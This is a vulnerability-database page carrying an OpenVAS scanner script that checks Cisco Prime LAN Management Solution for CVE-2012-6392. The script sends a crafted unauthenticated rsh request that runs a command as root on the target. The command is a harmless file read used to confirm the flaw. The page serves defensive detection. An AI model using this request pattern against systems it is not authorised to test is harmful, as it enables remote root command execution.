Lucene search
+L

Cisco Prime LAN Management Solution Remote Command Execution Vulnerability

🗓️ 24 Jan 2013 00:00:00Reported by Copyright (C) 2013 Greenbone AGType 
openvas
 openvas
🔗 plugins.openvas.org👁 24 Views

Cisco Prime LAN Management Solution RCE Vulnerabilit

Related
Refs
Code
ReporterTitlePublishedViews
Family
cisco
Cisco
Cisco Prime LAN Management Solution Command Execution Vulnerability
9 Jan 201316:00
cisco
checkpoint_advisories
Check Point Advisories
Cisco Prime LAN Management Solution Remote Command Execution (CVE-2012-6392)
29 Jan 201300:00
checkpoint_advisories
cve
CVE
CVE-2012-6392
17 Jan 201315:00
cve
cvelist
Cvelist
CVE-2012-6392
17 Jan 201315:00
cvelist
euvd
EUVD
EUVD-2012-6247
7 Oct 202500:30
euvd
nvd
NVD
CVE-2012-6392
17 Jan 201315:55
nvd
prion
Prion
Design/Logic Flaw
17 Jan 201315:55
prion
redhatcve
RedhatCVE
CVE-2012-6392
22 May 202504:14
redhatcve
nessus
Tenable Nessus
rsh Unauthenticated Access (via finger Information)
23 Apr 200000:00
nessus
saint
Saint
rsh Excessive Trust Vulnerability
25 Jan 201300:00
saint
Rows per page
# SPDX-FileCopyrightText: 2013 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.901215");
  script_version("2025-03-05T05:38:53+0000");
  script_tag(name:"last_modification", value:"2025-03-05 05:38:53 +0000 (Wed, 05 Mar 2025)");
  script_tag(name:"creation_date", value:"2013-01-24 16:05:48 +0530 (Thu, 24 Jan 2013)");
  script_cve_id("CVE-2012-6392");
  script_tag(name:"cvss_base", value:"10.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_name("Cisco Prime LAN Management Solution Remote Command Execution Vulnerability");
  script_copyright("Copyright (C) 2013 Greenbone AG");
  script_category(ACT_ATTACK);
  script_family("CISCO");
  script_dependencies("rsh.nasl", "os_detection.nasl");
  script_require_ports("Services/rsh", 514);
  script_mandatory_keys("Host/runs_unixoide");

  script_xref(name:"URL", value:"http://xforce.iss.net/xforce/xfdb/81110");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/57221");
  script_xref(name:"URL", value:"http://telussecuritylabs.com/threats/show/TSL20130118-01");
  script_xref(name:"URL", value:"http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130109-lms");

  script_tag(name:"impact", value:"Successful exploitation could allow attackers to execute arbitrary command
  in the context of the root user.");

  script_tag(name:"affected", value:"Cisco Prime LMS Virtual Appliance Version 4.1 through 4.2.2 on Linux.");

  script_tag(name:"insight", value:"Flaw is due to improper validation of authentication and authorization
  commands sent to certain TCP ports.");

  script_tag(name:"solution", value:"Upgrade to Cisco Prime LMS Virtual Appliance to 4.2.3 or later.");

  script_tag(name:"summary", value:"Cisco Prime LAN Management Solution is prone to a remote command execution (RCE) vulnerability.");

  script_tag(name:"solution_type", value:"VendorFix");
  script_tag(name:"qod_type", value:"remote_vul");

  exit(0);
}

include("host_details.inc");
include("port_service_func.inc");

port = service_get_port(default:514, proto:"rsh");

soc = open_priv_sock_tcp(dport:port);
if(!soc)
  exit(0);

## nb: request which will cat command with lms.info file on the target
crafted_data = string('0\0', "root", '\0', "root", '\0',
                      'cat /opt/CSCOpx/setup/lms.info\0');

send(socket: soc, data: crafted_data);
res = recv(socket: soc, length: 2048);
close(soc);

if(res && "LAN Management Solution" >< res) {
  security_message(port: port);
  exit(0);
}

exit(99);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Mar 2025 00:00Current
6.6Medium risk
Vulners AI Score6.6
CVSS 210
EPSS0.04635
24